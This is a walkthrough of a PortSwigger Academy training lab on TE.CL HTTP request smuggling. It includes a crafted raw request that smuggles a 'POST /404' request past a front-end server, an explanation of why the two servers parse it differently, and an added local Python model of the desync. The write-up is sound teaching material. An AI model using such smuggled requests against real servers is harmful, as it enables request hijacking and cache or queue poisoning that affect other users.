PortSwigger Academy Lab: HTTP request smuggling, confirming a TE.CL vulnerability via differential responses

Jun Takemura · March 17, 2025

Task

This lab involves a front-end and back-end server, and the back-end server doesn’t support chunked encoding.

To solve the lab, smuggle a request to the back-end server, so that a subsequent request for / (the web root) triggers a 404 Not Found response.

Solution

Send a request to Repeater. Change the protocol to HTTP/1. Also change the request method. Turn off "Update Content-Length". Show non-printable characters.

Craft a request to send:

POST / HTTP/1.1
Host: 0a12001c039286248178fc0f006300ee.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

Here 5e is the chunk size in hexadecimal (94 bytes), counted from POST to x=1. The trailing double CRLF (carriage return and line feed, \r\n\r\n) after 0 is very important here: it terminates the final zero-length chunk and so ends the chunked body. Without it the server will return an error.

The front-end server sees Transfer-Encoding and processes the data through x=1 and the terminating 0 chunk. However, the back-end server sees Content-Length: 4 and only processes up to 5e and its CRLF. It treats the rest of the request as a different request, and since that request's Content-Length is 15, more than the body bytes that remain, the back-end server will wait for more data.

So sending this request twice makes the server return a 404: the start of the second request completes the smuggled POST /404 request.
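The parsing disagreement described above, modelled locally as an added example (not part of the original post and not the lab's server code). It rebuilds the request bytes, then shows what a Transfer-Encoding parser and a Content-Length parser each leave unread. The host `lab.example` and all function names are assumptions made for the illustration.

```python
# Added illustration: local byte-level model of the TE.CL desync; no network I/O.
CRLF = b"\r\n"

def build_request(host: bytes, smuggled: bytes) -> bytes:
    """Outer request whose single chunk carries `smuggled`, as in the post."""
    size_line = format(len(smuggled), "x").encode() + CRLF   # chunk size in hex
    head = CRLF.join([
        b"POST / HTTP/1.1",
        b"Host: " + host,
        b"Content-Type: application/x-www-form-urlencoded",
        b"Content-Length: " + str(len(size_line)).encode(),  # covers only "5e\r\n"
        b"Transfer-Encoding: chunked",
    ]) + CRLF + CRLF
    return head + size_line + smuggled + CRLF + b"0" + CRLF + CRLF

def split_head(raw: bytes):
    """Split one request into a lower-cased header dict and the bytes after it."""
    head, _, body = raw.partition(CRLF + CRLF)
    headers = {}
    for line in head.split(CRLF)[1:]:        # skip the request line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, body

def frontend_leftover(raw: bytes) -> bytes:
    """Transfer-Encoding parser: consume chunks up to the zero-length chunk."""
    _, body = split_head(raw)
    while True:
        size_line, _, body = body.partition(CRLF)
        size = int(size_line, 16)
        if size == 0:
            return body[len(CRLF):]          # skip the CRLF that ends the body
        body = body[size + len(CRLF):]       # skip chunk data and its CRLF

def backend_leftover(raw: bytes) -> bytes:
    """Content-Length parser: consume exactly that many body bytes."""
    headers, body = split_head(raw)
    return body[int(headers[b"content-length"]):]

def bytes_still_awaited(leftover: bytes) -> int:
    """Body bytes the leftover request still expects from the next request."""
    headers, body = split_head(leftover)
    return int(headers[b"content-length"]) - len(body)

SMUGGLED = (b"POST /404 HTTP/1.1\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: 15\r\n\r\nx=1")
RAW = build_request(b"lab.example", SMUGGLED)  # constructed placeholder host
```

An empty front-end leftover next to a non-empty back-end leftover is the desync itself; it disappears when both parsers are made to honour the same length header.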
